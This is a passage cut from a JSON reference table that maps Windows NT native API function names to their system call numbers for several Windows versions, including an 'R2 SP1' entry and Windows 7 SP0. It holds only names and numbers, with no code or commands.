"160", "NtCreateProfileEx": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisableLastKnownGood": "183", "NtDisplayString": "184", "NtDrawText": "185", "NtEnableLastKnownGood": "186", "NtEnumerateBootEntries": "187", "NtEnumerateDriverEntries": "188", "NtEnumerateSystemEnvironmentValuesEx": "189", "NtEnumerateTransactionObject": "190", "NtExtendSection": "191", "NtFilterToken": "192", "NtFlushInstallUILanguage": "193", "NtFlushInstructionCache": "194", "NtFlushKey": "195", "NtFlushProcessWriteBuffers": "196", "NtFlushVirtualMemory": "197", "NtFlushWriteBuffer": "198", "NtFreeUserPhysicalPages": "199", "NtFreezeRegistry": "200", "NtFreezeTransactions": "201", "NtGetContextThread": "202", "NtGetCurrentProcessorNumber": "203", "NtGetDevicePowerState": "204", "NtGetMUIRegistryInfo": "205", "NtGetNextProcess": "206", "NtGetNextThread": "207", "NtGetNlsSectionPtr": "208", "NtGetNotificationResourceManager": "209", "NtGetPlugPlayEvent": "210", "NtGetWriteWatch": "211", "NtImpersonateAnonymousToken": "212", "NtImpersonateThread": "213", "NtInitializeNlsFiles": "214", "NtInitializeRegistry": "215", "NtInitiatePowerAction": "216", "NtIsSystemResumeAutomatic": "217", "NtIsUILanguageComitted": "218", "NtListenPort": "219", "NtLoadDriver": "220", "NtLoadKey": "221", "NtLoadKey2": "222", "NtLoadKeyEx": "223", "NtLockFile": "224", "NtLockProductActivationKeys": "225", "NtLockRegistryKey": "226", "NtLockVirtualMemory": "227", "NtMakePermanentObject": "228", "NtMakeTemporaryObject": "229", "NtMapCMFModule": "230", "NtMapUserPhysicalPages": "231", "NtModifyBootEntry": "232", "NtModifyDriverEntry": "233", "NtNotifyChangeDirectoryFile": "234", "NtNotifyChangeKey": "235", "NtNotifyChangeMultipleKeys": "236", "NtNotifyChangeSession": "237", "NtOpenEnlistment": "238", "NtOpenEventPair": "239", "NtOpenIoCompletion": "240", "NtOpenJobObject": "241", "NtOpenKeyEx": "242", "NtOpenKeyTransacted": "243", "NtOpenKeyTransactedEx": "244", "NtOpenKeyedEvent": "245", "NtOpenMutant": "246", "NtOpenObjectAuditAlarm": "247", "NtOpenPrivateNamespace": "248", "NtOpenProcessToken": "249", "NtOpenResourceManager": "250", "NtOpenSemaphore": "251", "NtOpenSession": "252", "NtOpenSymbolicLinkObject": "253", "NtOpenThread": "254", "NtOpenTimer": "255", "NtOpenTransaction": "256", "NtOpenTransactionManager": "257", "NtPlugPlayControl": "258", "NtPrePrepareComplete": "259", "NtPrePrepareEnlistment": "260", "NtPrepareComplete": "261", "NtPrepareEnlistment": "262", "NtPrivilegeCheck": "263", "NtPrivilegeObjectAuditAlarm": "264", "NtPrivilegedServiceAuditAlarm": "265", "NtPropagationComplete": "266", "NtPropagationFailed": "267", "NtPulseEvent": "268", "NtQueryBootEntryOrder": "269", "NtQueryBootOptions": "270", "NtQueryDebugFilterState": "271", "NtQueryDirectoryObject": "272", "NtQueryDriverEntryOrder": "273", "NtQueryEaFile": "274", "NtQueryFullAttributesFile": "275", "NtQueryInformationAtom": "276", "NtQueryInformationEnlistment": "277", "NtQueryInformationJobObject": "278", "NtQueryInformationPort": "279", "NtQueryInformationResourceManager": "280", "NtQueryInformationTransaction": "281", "NtQueryInformationTransactionManager": "282", "NtQueryInformationWorkerFactory": "283", "NtQueryInstallUILanguage": "284", "NtQueryIntervalProfile": "285", "NtQueryIoCompletion": "286", "NtQueryLicenseValue": "287", "NtQueryMultipleValueKey": "288", "NtQueryMutant": "289", "NtQueryOpenSubKeys": "290", "NtQueryOpenSubKeysEx": "291", "NtQueryPortInformationProcess": "292", "NtQueryQuotaInformationFile": "293", "NtQuerySecurityAttributesToken": "294", "NtQuerySecurityObject": "295", "NtQuerySemaphore": "296", "NtQuerySymbolicLinkObject": "297", "NtQuerySystemEnvironmentValue": "298", "NtQuerySystemEnvironmentValueEx": "299", "NtQuerySystemInformationEx": "300", "NtQueryTimerResolution": "301", "NtQueueApcThreadEx": "302", "NtRaiseException": "303", "NtRaiseHardError": "304", "NtReadOnlyEnlistment": "305", "NtRecoverEnlistment": "306", "NtRecoverResourceManager": "307", "NtRecoverTransactionManager": "308", "NtRegisterProtocolAddressInformation": "309", "NtRegisterThreadTerminatePort": "310", "NtReleaseKeyedEvent": "311", "NtReleaseWorkerFactoryWorker": "312", "NtRemoveIoCompletionEx": "313", "NtRemoveProcessDebug": "314", "NtRenameKey": "315", "NtRenameTransactionManager": "316", "NtReplaceKey": "317", "NtReplacePartitionUnit": "318", "NtReplyWaitReplyPort": "319", "NtRequestPort": "320", "NtResetEvent": "321", "NtResetWriteWatch": "322", "NtRestoreKey": "323", "NtResumeProcess": "324", "NtRollbackComplete": "325", "NtRollbackEnlistment": "326", "NtRollbackTransaction": "327", "NtRollforwardTransactionManager": "328", "NtSaveKey": "329", "NtSaveKeyEx": "330", "NtSaveMergedKeys": "331", "NtSecureConnectPort": "332", "NtSerializeBoot": "333", "NtSetBootEntryOrder": "334", "NtSetBootOptions": "335", "NtSetContextThread": "336", "NtSetDebugFilterState": "337", "NtSetDefaultHardErrorPort": "338", "NtSetDefaultLocale": "339", "NtSetDefaultUILanguage": "340", "NtSetDriverEntryOrder": "341", "NtSetEaFile": "342", "NtSetHighEventPair": "343", "NtSetHighWaitLowEventPair": "344", "NtSetInformationDebugObject": "345", "NtSetInformationEnlistment": "346", "NtSetInformationJobObject": "347", "NtSetInformationKey": "348", "NtSetInformationResourceManager": "349", "NtSetInformationToken": "350", "NtSetInformationTransaction": "351", "NtSetInformationTransactionManager": "352", "NtSetInformationWorkerFactory": "353", "NtSetIntervalProfile": "354", "NtSetIoCompletion": "355", "NtSetIoCompletionEx": "356", "NtSetLdtEntries": "357", "NtSetLowEventPair": "358", "NtSetLowWaitHighEventPair": "359", "NtSetQuotaInformationFile": "360", "NtSetSecurityObject": "361", "NtSetSystemEnvironmentValue": "362", "NtSetSystemEnvironmentValueEx": "363", "NtSetSystemInformation": "364", "NtSetSystemPowerState": "365", "NtSetSystemTime": "366", "NtSetThreadExecutionState": "367", "NtSetTimerEx": "368", "NtSetTimerResolution": "369", "NtSetUuidSeed": "370", "NtSetVolumeInformationFile": "371", "NtShutdownSystem": "372", "NtShutdownWorkerFactory": "373", "NtSignalAndWaitForSingleObject": "374", "NtSinglePhaseReject": "375", "NtStartProfile": "376", "NtStopProfile": "377", "NtSuspendProcess": "378", "NtSuspendThread": "379", "NtSystemDebugControl": "380", "NtTerminateJobObject": "381", "NtTestAlert": "382", "NtThawRegistry": "383", "NtThawTransactions": "384", "NtTraceControl": "385", "NtTranslateFilePath": "386", "NtUmsThreadYield": "387", "NtUnloadDriver": "388", "NtUnloadKey": "389", "NtUnloadKey2": "390", "NtUnloadKeyEx": "391", "NtUnlockFile": "392", "NtUnlockVirtualMemory": "393", "NtVdmControl": "394", "NtWaitForDebugEvent": "395", "NtWaitForKeyedEvent": "396", "NtWaitForWorkViaWorkerFactory": "397", "NtWaitHighEventPair": "398", "NtWaitLowEventPair": "399", "NtWorkerFactoryWorkerReady": "400"}, "R2 SP1": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateReserveObject": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelIoFileEx": "134", "NtCancelSynchronousIoFile": "135", "NtCommitComplete": "136", "NtCommitEnlistment": "137", "NtCommitTransaction": "138", "NtCompactKeys": "139", "NtCompareTokens": "140", "NtCompleteConnectPort": "141", "NtCompressKey": "142", "NtConnectPort": "143", "NtCreateDebugObject": "144", "NtCreateDirectoryObject": "145", "NtCreateEnlistment": "146", "NtCreateEventPair": "147", "NtCreateIoCompletion": "148", "NtCreateJobObject": "149", "NtCreateJobSet": "150", "NtCreateKeyTransacted": "151", "NtCreateKeyedEvent": "152", "NtCreateMailslotFile": "153", "NtCreateMutant": "154", "NtCreateNamedPipeFile": "155", "NtCreatePagingFile": "156", "NtCreatePort": "157", "NtCreatePrivateNamespace": "158", "NtCreateProcess": "159", "NtCreateProfile": "160", "NtCreateProfileEx": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisableLastKnownGood": "183", "NtDisplayString": "184", "NtDrawText": "185", "NtEnableLastKnownGood": "186", "NtEnumerateBootEntries": "187", "NtEnumerateDriverEntries": "188", "NtEnumerateSystemEnvironmentValuesEx": "189", "NtEnumerateTransactionObject": "190", "NtExtendSection": "191", "NtFilterToken": "192", "NtFlushInstallUILanguage": "193", "NtFlushInstructionCache": "194", "NtFlushKey": "195", "NtFlushProcessWriteBuffers": "196", "NtFlushVirtualMemory": "197", "NtFlushWriteBuffer": "198", "NtFreeUserPhysicalPages": "199", "NtFreezeRegistry": "200", "NtFreezeTransactions": "201", "NtGetContextThread": "202", "NtGetCurrentProcessorNumber": "203", "NtGetDevicePowerState": "204", "NtGetMUIRegistryInfo": "205", "NtGetNextProcess": "206", "NtGetNextThread": "207", "NtGetNlsSectionPtr": "208", "NtGetNotificationResourceManager": "209", "NtGetPlugPlayEvent": "210", "NtGetWriteWatch": "211", "NtImpersonateAnonymousToken": "212", "NtImpersonateThread": "213", "NtInitializeNlsFiles": "214", "NtInitializeRegistry": "215", "NtInitiatePowerAction": "216", "NtIsSystemResumeAutomatic": "217", "NtIsUILanguageComitted": "218", "NtListenPort": "219", "NtLoadDriver": "220", "NtLoadKey": "221", "NtLoadKey2": "222", "NtLoadKeyEx": "223", "NtLockFile": "224", "NtLockProductActivationKeys": "225", "NtLockRegistryKey": "226", "NtLockVirtualMemory": "227", "NtMakePermanentObject": "228", "NtMakeTemporaryObject": "229", "NtMapCMFModule": "230", "NtMapUserPhysicalPages": "231", "NtModifyBootEntry": "232", "NtModifyDriverEntry": "233", "NtNotifyChangeDirectoryFile": "234", "NtNotifyChangeKey": "235", "NtNotifyChangeMultipleKeys": "236", "NtNotifyChangeSession": "237", "NtOpenEnlistment": "238", "NtOpenEventPair": "239", "NtOpenIoCompletion": "240", "NtOpenJobObject": "241", "NtOpenKeyEx": "242", "NtOpenKeyTransacted": "243", "NtOpenKeyTransactedEx": "244", "NtOpenKeyedEvent": "245", "NtOpenMutant": "246", "NtOpenObjectAuditAlarm": "247", "NtOpenPrivateNamespace": "248", "NtOpenProcessToken": "249", "NtOpenResourceManager": "250", "NtOpenSemaphore": "251", "NtOpenSession": "252", "NtOpenSymbolicLinkObject": "253", "NtOpenThread": "254", "NtOpenTimer": "255", "NtOpenTransaction": "256", "NtOpenTransactionManager": "257", "NtPlugPlayControl": "258", "NtPrePrepareComplete": "259", "NtPrePrepareEnlistment": "260", "NtPrepareComplete": "261", "NtPrepareEnlistment": "262", "NtPrivilegeCheck": "263", "NtPrivilegeObjectAuditAlarm": "264", "NtPrivilegedServiceAuditAlarm": "265", "NtPropagationComplete": "266", "NtPropagationFailed": "267", "NtPulseEvent": "268", "NtQueryBootEntryOrder": "269", "NtQueryBootOptions": "270", "NtQueryDebugFilterState": "271", "NtQueryDirectoryObject": "272", "NtQueryDriverEntryOrder": "273", "NtQueryEaFile": "274", "NtQueryFullAttributesFile": "275", "NtQueryInformationAtom": "276", "NtQueryInformationEnlistment": "277", "NtQueryInformationJobObject": "278", "NtQueryInformationPort": "279", "NtQueryInformationResourceManager": "280", "NtQueryInformationTransaction": "281", "NtQueryInformationTransactionManager": "282", "NtQueryInformationWorkerFactory": "283", "NtQueryInstallUILanguage": "284", "NtQueryIntervalProfile": "285", "NtQueryIoCompletion": "286", "NtQueryLicenseValue": "287", "NtQueryMultipleValueKey": "288", "NtQueryMutant": "289", "NtQueryOpenSubKeys": "290", "NtQueryOpenSubKeysEx": "291", "NtQueryPortInformationProcess": "292", "NtQueryQuotaInformationFile": "293", "NtQuerySecurityAttributesToken": "294", "NtQuerySecurityObject": "295", "NtQuerySemaphore": "296", "NtQuerySymbolicLinkObject": "297", "NtQuerySystemEnvironmentValue": "298", "NtQuerySystemEnvironmentValueEx": "299", "NtQuerySystemInformationEx": "300", "NtQueryTimerResolution": "301", "NtQueueApcThreadEx": "302", "NtRaiseException": "303", "NtRaiseHardError": "304", "NtReadOnlyEnlistment": "305", "NtRecoverEnlistment": "306", "NtRecoverResourceManager": "307", "NtRecoverTransactionManager": "308", "NtRegisterProtocolAddressInformation": "309", "NtRegisterThreadTerminatePort": "310", "NtReleaseKeyedEvent": "311", "NtReleaseWorkerFactoryWorker": "312", "NtRemoveIoCompletionEx": "313", "NtRemoveProcessDebug": "314", "NtRenameKey": "315", "NtRenameTransactionManager": "316", "NtReplaceKey": "317", "NtReplacePartitionUnit": "318", "NtReplyWaitReplyPort": "319", "NtRequestPort": "320", "NtResetEvent": "321", "NtResetWriteWatch": "322", "NtRestoreKey": "323", "NtResumeProcess": "324", "NtRollbackComplete": "325", "NtRollbackEnlistment": "326", "NtRollbackTransaction": "327", "NtRollforwardTransactionManager": "328", "NtSaveKey": "329", "NtSaveKeyEx": "330", "NtSaveMergedKeys": "331", "NtSecureConnectPort": "332", "NtSerializeBoot": "333", "NtSetBootEntryOrder": "334", "NtSetBootOptions": "335", "NtSetContextThread": "336", "NtSetDebugFilterState": "337", "NtSetDefaultHardErrorPort": "338", "NtSetDefaultLocale": "339", "NtSetDefaultUILanguage": "340", "NtSetDriverEntryOrder": "341", "NtSetEaFile": "342", "NtSetHighEventPair": "343", "NtSetHighWaitLowEventPair": "344", "NtSetInformationDebugObject": "345", "NtSetInformationEnlistment": "346", "NtSetInformationJobObject": "347", "NtSetInformationKey": "348", "NtSetInformationResourceManager": "349", "NtSetInformationToken": "350", "NtSetInformationTransaction": "351", "NtSetInformationTransactionManager": "352", "NtSetInformationWorkerFactory": "353", "NtSetIntervalProfile": "354", "NtSetIoCompletion": "355", "NtSetIoCompletionEx": "356", "NtSetLdtEntries": "357", "NtSetLowEventPair": "358", "NtSetLowWaitHighEventPair": "359", "NtSetQuotaInformationFile": "360", "NtSetSecurityObject": "361", "NtSetSystemEnvironmentValue": "362", "NtSetSystemEnvironmentValueEx": "363", "NtSetSystemInformation": "364", "NtSetSystemPowerState": "365", "NtSetSystemTime": "366", "NtSetThreadExecutionState": "367", "NtSetTimerEx": "368", "NtSetTimerResolution": "369", "NtSetUuidSeed": "370", "NtSetVolumeInformationFile": "371", "NtShutdownSystem": "372", "NtShutdownWorkerFactory": "373", "NtSignalAndWaitForSingleObject": "374", "NtSinglePhaseReject": "375", "NtStartProfile": "376", "NtStopProfile": "377", "NtSuspendProcess": "378", "NtSuspendThread": "379", "NtSystemDebugControl": "380", "NtTerminateJobObject": "381", "NtTestAlert": "382", "NtThawRegistry": "383", "NtThawTransactions": "384", "NtTraceControl": "385", "NtTranslateFilePath": "386", "NtUmsThreadYield": "387", "NtUnloadDriver": "388", "NtUnloadKey": "389", "NtUnloadKey2": "390", "NtUnloadKeyEx": "391", "NtUnlockFile": "392", "NtUnlockVirtualMemory": "393", "NtVdmControl": "394", "NtWaitForDebugEvent": "395", "NtWaitForKeyedEvent": "396", "NtWaitForWorkViaWorkerFactory": "397", "NtWaitHighEventPair": "398", "NtWaitLowEventPair": "399", "NtWorkerFactoryWorkerReady": "400"}}, "Windows 7": {"SP0": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateReserveObject": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelIoFileEx": "134", "NtCancelSynchronousIoFile": "135", "NtCommitComplete": "136", "NtCommitEnlistment": "137", "NtCommitTransaction": "138", "NtCompactKeys": "139", "NtCompareTokens": "140", "NtCompleteConnectPort": "141", "NtCompressKey": "142", "NtConnectPort": "143", "NtCreateDebugObject": "144", "NtCreateDirectoryObject": "145", "NtCreateEnlistment": "146", "NtCreateEventPair": "147", "NtCreateIoCompletion": "148", "NtCreateJobObject": "149", "NtCreateJobSet": "150", "NtCreateKeyTransacted": "151", "NtCreateKeyedEvent": "152", "NtCreateMailslotFile": "153", "NtCreateMutant": "154", "NtCreateNamedPipeFile": "155", "NtCreatePagingFile": "156", "NtCreatePort": "157", "NtCreatePrivateNamespace": "158", "NtCreateProcess": "159", "NtCreateProfile": "160", "NtCreateProfileEx": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisableLastKnownGood": "183", "NtDisplayString": "184", "NtDrawText": "185", "NtEnableLastKnownGood": "186", "NtEnumerateBootEntries": "187", "NtEnumerateDriverEntries": "188", "NtEnumerateSystemEnvironmentValuesEx": "189", "NtEnumerateTransactionObject": "190", "NtExtendSection": "191", "NtFilterToken": "192", "NtFlushInstallUILanguage": "193", "NtFlushInstructionCache": "194", "NtFlushKey": "195", "NtFlushProcessWriteBuffers": "196", "NtFlushVirtualMemory": "197", "NtFlushWriteBuffer": "198", "NtFreeUserPhysicalPages": "199", "NtFreezeRegistry": "200", "NtFreezeTransactions": "201", "NtGetContextThread": "202", "NtGetCurrentProcessorNumber": "203", "NtGetDevicePowerState": "204", "NtGetMUIRegistryInfo": "205", "NtGetNextProcess": "206", "NtGetNextThread": "207", "NtGetNlsSectionPtr": "208", "NtGetNotificationResourceManager": "209", "NtGetPlugPlayEvent": "210", "NtGetWriteWatch": "211", "NtImpersonateAnonymousToken": "212", "NtImpersonateThread": "213", "NtInitializeNlsFiles": "214", "NtInitializeRegistry": "215", "NtInitiatePowerAction": "216", "NtIsSystemResumeAutomatic": "217", "NtIsUILanguageComitted": "218", "NtListenPort": "219", "NtLoadDriver": "220", "NtLoadKey": "221", "NtLoadKey2": "222", "NtLoadKeyEx": "223", "NtLockFile": "224", "NtLockProductActivationKeys": "225", "NtLockRegistryKey": "226", "NtLockVirtualMemory": "227", "NtMakePermanentObject": "228", "NtMakeTemporaryObject": "229", "NtMapCMFModule": "230", "NtMapUserPhysicalPages": "231", "NtModifyBootEntry": "232", "NtModifyDriverEntry": "233", "NtNotifyChangeDirectoryFile": "234", "NtNotifyChangeKey": "235", "NtNotifyChangeMultipleKeys": "236", "NtNotifyChangeSession": "237", "NtOpenEnlistment": "238", "NtOpenEventPair": "239", "NtOpenIoCompletion": "240", "NtOpenJobObject": "241", "NtOpenKeyEx": "242", "NtOpenKeyTransacted": "243", "NtOpenKeyTransactedEx": "244", "NtOpenKeyedEvent": "245", "NtOpenMutant": "246", "NtOpenObjectAuditAlarm": "247", "NtOpenPrivateNamespace": "248", "NtOpenProcessToken": "249", "NtOpenResourceManager": "250", "NtOpenSemaphore": "251", "NtOpenSession": "252", "NtOpenSymbolicLinkObject": "253", "NtOpenThread": "254", "NtOpenTimer": "255", "NtOpenTransaction": "256", "NtOpenTransactionManager": "257", "NtPlugPlayControl": "258", "NtPrePrepareComplete": "259", "NtPrePrepareEnlistment": "260", "NtPrepareComplete": "261", "NtPrepareEnlistment": "262", "NtPrivilegeCheck": "263", "NtPrivilegeObjectAuditAlarm": "264", "NtPrivilegedServiceAuditAlarm": "265", "NtPropagationComplete": "266", "NtPropagationFailed": "267", "NtPulseEvent": "268", "NtQueryBootEntryOrder": "269", "NtQueryBootOptions": "270", "NtQueryDebugFilterState": "271", "NtQueryDirectoryObject": "272", "NtQueryDriverEntryOrder": "273", "NtQueryEaFile": "274", "NtQueryFullAttributesFile": "275", "NtQueryInformationAtom": "276", "NtQueryInformationEnlistment": "277", "NtQueryInformationJobObject": "278", "NtQueryInformationPort": "279", "NtQueryInformationResourceManager": "280", "NtQueryInformationTransaction": "281", "NtQueryInformationTransactionManager": "282", "NtQueryInformationWorkerFactory": "283", "NtQueryInstallUILanguage": "284", "NtQueryIntervalProfile": "285", "NtQueryIoCompletion": "286", "NtQueryLicenseValue": "287", "NtQueryMultipleValueKey": "288", "NtQueryMutant": "289", "NtQueryOpenSubKeys": "290", "NtQueryOpenSubKeysEx": "291", "NtQueryPortInformationProcess": "292", "NtQueryQuotaInformationFile": "293", "NtQuerySecurityAttributesToken": "294", 